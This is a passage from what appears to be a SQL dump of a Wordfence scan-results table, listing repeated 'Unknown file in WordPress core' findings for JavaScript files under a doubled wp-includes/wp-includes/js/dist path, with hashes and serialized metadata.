More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/data-controls.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27103,1631424900,1631424900,'new','knownfile',75,'2e523f1f25b69d991effc154b1dcaacd','c17c05cb35ee5382e384503f9e33b6fb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/data.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27104,1631424900,1631424900,'new','knownfile',75,'6a92c3bb7a5f6435bf42c95ef1a59e0a','56693db31b014781e49f23959d88a6da','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/data.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27105,1631424900,1631424900,'new','knownfile',75,'4e18b0c7e529339cf8157cc8ce2a2d76','07e887305436c7375f14a23e2ee395ba','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/date.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/date.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27106,1631424900,1631424900,'new','knownfile',75,'6b9b0e76e3cbe8dbf6e6698c86f69c9b','fa2431ddd60046804346b4bd1015086f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/date.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/date.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27107,1631424900,1631424900,'new','knownfile',75,'2de47da35d70b7788d2a1b1e0329ce1b','f4b00c30d5dbbe8931ee7e9f2665142c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/deprecated.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/deprecated.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27108,1631424901,1631424901,'new','knownfile',75,'4e04e3b56f87dcb1aace3178855ce247','affd60633b492e51e7e0bbc415746e36','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/deprecated.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/deprecated.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27109,1631424901,1631424901,'new','knownfile',75,'d4fa27e7d3d59596de0779487d053ba6','0f3d82d4b1a2214ce971a9c5bc092678','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom-ready.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/dom-ready.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27110,1631424901,1631424901,'new','knownfile',75,'54c189fd2f71169bf094263a70d968a8','58ceec494bd885d681377d83ee03498f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom-ready.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/dom-ready.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27111,1631424901,1631424901,'new','knownfile',75,'270b6e806d014e423db8a536a6231a28','9f8672503b95389f52ada339b8c16195','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/dist/dom.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27112,1631424901,1631424901,'new','knownfile',75,'480862efaac173c94ee508b4961413eb','6a641f11f178e3b26c3113f3aa8660a1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/dom.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27113,1631424901,1631424901,'new','knownfile',75,'75765108bcda4f95443358ee0f91f6df','2f6e06d249199404838243c4b07ca2d3','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/edit-post.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/edit-post.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27114,1631424901,1631424901,'new','knownfile',75,'35fd7bbea6723792a4b5465d92a491b7','4eb5f9fa71eb921ddd4aae6f104d6716','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/edit-post.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/edit-post.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27115,1631424901,1631424901,'new','knownfile',75,'715cb16a39f300a10c9cf5ff1639ff52','d16491d60a2d92c81501dc1063600149','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/editor.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/dist/editor.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27116,1631424901,1631424901,'new','knownfile',75,'8869314f6d39e322c587f105f7e5fcb2','b8e1ec6c70179c66d038bcf38ea89494','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/editor.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/editor.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27117,1631424901,1631424901,'new','knownfile',75,'0511835fb36b36eea46c3bf130fc7362','b86f89fb1cecb1fca1fb1c88d35c7a04','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/element.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/element.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27118,1631424901,1631424901,'new','knownfile',75,'bd1999d575649642f9712830cd295991','522d4ac5e742a0c39a6c1529710d267e','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/element.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/element.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27119,1631424901,1631424901,'new','knownfile',75,'8b4d1e19e7ce71af6b5186849d91a022','2789df24d84861993863439998401f20','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/escape-html.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/escape-html.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27120,1631424901,1631424901,'new','knownfile',75,'b64a22f263137018bd5a212d65525f70','2573593b4fa3eff721cfb2cb79732c3b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/escape-html.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/escape-html.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27121,1631424901,1631424901,'new','knownfile',75,'df40eae986baa2ce1c80c5b75c435455','43bad9056921b810c0c6483fed0df6ce','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/format-library.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/format-library.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27122,1631424901,1631424901,'new','knownfile',75,'0f343f364e804ea9d50a255e791e761c','69df92e1f81948d0a8bfb58796005430','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/format-library.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/format-library.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27123,1631424901,1631424901,'new','knownfile',75,'1ed6534e29854b9fb6efceed49aa5eea','1dfe1bc878405acf368f4a5efb4a8d62','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/hooks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/dist/hooks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27124,1631424902,1631424902,'new','knownfile',75,'68e25ef6023bbca1a93470bc44e81e18','5006dc9e2ac421e5efaf20a7f20d1b70','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/hooks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/hooks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27125,1631424902,1631424902,'new','knownfile',75,'15d198638ab13c648b87ff21988c17ee','19c492e92491ad09375407fa54435814','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/html-entities.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/html-entities.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27126,1631424902,1631424902,'new','knownfile',75,'7140fd5ed0885985866e35e4f78ead8e','b3c5acef3e97d7ff0f2c2955a0fd8cff','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/html-entities.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/html-entities.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27127,1631424902,1631424902,'new','knownfile',75,'abd7132e0c28c01894c4c67ca1edc1a9','0990d368c5b8444552e276f4cc8e684b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/i18n.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/i18n.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27128,1631424902,1631424902,'new','knownfile',75,'0f5342a406a60a77284d33860fed4e22','ff20822a5ab7d1ba9c872269e8994fd8','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/i18n.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/i18n.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27129,1631424902,1631424902,'new','knownfile',75,'947009cd44d1aefbf324f822e83bbcfc','1ff4a31ca218935f4d2d1900a61f2707','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/is-shallow-equal.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/is-shallow-equal.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27130,1631424902,1631424902,'new','knownfile',75,'5e21509d1417833c33fab48d4e0e8652','7fca0aaf45d9db4c7b6c7f74f0356596','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/is-shallow-equal.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/dist/is-shallow-equal.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27131,1631424902,1631424902,'new','knownfile',75,'eebf7e1f7faa8281dc343d5ad9c90818','b0ecd16e73001044deeab0b53367863c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keyboard-shortcuts.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/keyboard-shortcuts.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27132,1631424902,1631424902,'new','knownfile',75,'2059f465c84b0268289ab4a9a6ecd775','9d7c49060fc39b36860638248fe8627b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keyboard-shortcuts.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/dist/keyboard-shortcuts.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27133,1631424902,1631424902,'new','knownfile',75,'64e5c0dec8dd9f7530f3ca321dfb3d07','cdbb24f6bac58cdb3c758b3cd971bc9f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keycodes.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/keycodes.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27134,1631424902,1631424902,'new','knownfile',75,'aab956ef67359794322931a6261c55f9','8ce46aead738c5835936db0384d6c0cb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/keycodes.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/keycodes.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27135,1631424902,1631424902,'new','knownfile',75,'9c92ec3aedb7eac86a74536e0083f1f7','de9bfecd6139d79abac14944ab1cee40','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/list-reusable-blocks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/dist/list-reusable-blocks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27136,1631424902,1631424902,'new','knownfile',75,'fd662f90b4a96b65b1b7a8ccc7f83dde','2d733c73787d4d294123ac5690ccfcfb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/list-reusable-blocks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/dist/list-reusable-blocks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27137,1631424902,1631424902,'new','knownfile',75,'de92c1df4f71cc86ad47d46738d69d2f','2836720a7835b6759727c4c15a39e779','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/media-utils.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/media-utils.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27138,1631424902,1631424902,'new','knownfile',75,'f932d202aba4273528721a59f9058347','59696e54b1ac16874250d06ddcf11673','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/media-utils.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/media-utils.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27139,1631424903,1631424903,'new','knownfile',75,'d2ee274fa7bad3b499601542788caa9f','4874470551b723f2cea8b5268e925975','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/notices.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/notices.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27140,1631424903,1631424903,'new','knownfile',75,'c61ea5bd4cea7d743960fa42dc5bdca8','f8ef6d4e869ea4bf9fb16b719ae9a200','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/notices.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/notices.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27141,1631424903,1631424903,'new','knownfile',75,'1daa14257dd08f2c6832282c3ec35d97','fd6c253b0979c5db1aa7923ae3b3c653','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/nux.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/dist/nux.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27142,1631424903,1631424903,'new','knownfile',75,'9ff9ff5e0d668524b35f3ac2f0fc8152','7034447f82fe8adb327d9a76bf63f695','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/nux.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 